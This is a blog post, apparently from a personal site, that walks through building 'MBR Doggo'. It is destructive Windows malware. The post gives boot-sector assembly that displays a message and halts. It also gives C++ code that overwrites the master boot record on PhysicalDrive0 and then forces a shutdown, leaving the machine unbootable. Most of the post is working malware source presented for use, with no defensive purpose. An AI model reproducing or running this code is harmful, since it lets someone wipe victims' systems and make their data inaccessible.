Windows MBR destroyer
Submitted on 2016-08-10 01:13:34 by Luuk

MBR Doggo

MBR Doggo is a small Windows executable that will override your Masterbootrecord with custom Assembly code thus stopping Windows from booting and running my own Assembly code.

The MBR has a maximum size of 512 Bytes and is located at the beginning of the disk. The BIOS will read these 512 Bytes and checks if the last byte is set to 0xAA55 (The standard boot signature) if this is true the BIOS will attempt to execute the code stored in the first 512 Bytes of the disk, If this is false the BIOS will try to read the next drive, USB Stick, DVD player etc.

Assembly

On a normal working Windows installation the MBR can for example contain code that tells the BIOS to start loading code on part XXX of the disk which in turn starts loading the OS.

In our case Windows never gets a chance to load because the MBR has been overwritten with a small piece of code that displays an onscreen message and then drops into a infinite loop.

MBR.asm

BITS 16

start:

mov ax, 07C0h                

add ax, 288                

mov ss, ax

mov sp, 4096

mov ax, 07C0h                

mov ds, ax

mov si, text_string        

call print_string        

jmp $                        

text_string db 'You have been visited by the MBR doggo',13,10,'Sleep tite Windows.',0

print_string:                        

mov ah, 0Eh                

.repeat:

lodsb                        

cmp al, 0

je .done                

int 10h                        

jmp .repeat

.done:

ret

times 510-($-$$) db 0        ; Pad remainder of boot sector with 0s

dw 0xAA55                ; The standard PC boot signature

Now if we write the compiled binary version to the bootloader of a usb drive and try booting from it using QEMU we get the following results

mbr1.png

Great! Now that we know that it's working we can start writing our C++ program that will be used to overwrite the bootloader.

MBRDoggo.cpp

#include <windows.h>

#include <conio.h>

#include <stdio.h>

void ripMBR() {

        DWORD write;

        char data[] = { (INSERT HEX MBR PAYLOAD HERE) };

        //MBR Payload

        HANDLE disk = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);

        WriteFile(disk, data, 512, &write, NULL);

        CloseHandle(disk);

        //MessageBox(0, "Thanks for using MBR doggo!", "Sleep Tite", MB_ICONWARNING);

        system("shutdown -s -t 0");

}

void main() {

        ripMBR();

}

The Payload

I have converted the new MBR binary we just created into a comma separated hex string and stored it inside an array. Of course you can read the binary as an external file and use it that way but I wanted to keep it simple and all in one .exe file and this is my way of doing so.

mbr2.png

Example conversion

0xB8,0xC0,0x07,0x05,0x20,0x01,0x8E,0xD0,0xBC, (You get the idea)

That's about it really now if you run this .exe it will overwrite your MBR and reboot the computer rendering it useless.

Esselbr - Windows MBR destroyer
© Esselbr.nl 2016